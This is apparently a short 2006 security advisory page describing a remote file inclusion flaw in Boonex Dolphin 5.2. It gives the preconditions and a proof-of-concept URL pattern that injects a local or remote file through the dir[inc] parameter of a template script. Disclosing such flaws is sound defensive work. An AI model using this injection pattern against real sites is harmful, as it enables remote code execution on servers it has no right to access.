Lucene search
SecurityvulnsSECURITYVULNS:DOC:14741HistoryOct 19, 2006 - 12:00 a.m.
Boonex Dolphin 5.2 Remote File Inclusion
2006-10-1900:00:00
vulners.com
33
/****************************************/
CREDIT:
w4ck1ng.com
PRODUCT:
Boonex Dolphin 5.2
http://www.boonex.com/products/dolphin/
VULNERABILITY:
Remote File Inclusion
NOTES:
- requires register globals on
- requires magic quotes off
POC:
<host>/<path>/templates/tmpl_dfl/scripts/index.php?dir[inc]=<local/remot
efile>
ADVISORY & EXPLOIT (requires registration):
http://w4ck1ng.com/board/showthread.php?t=1490
/****************************************/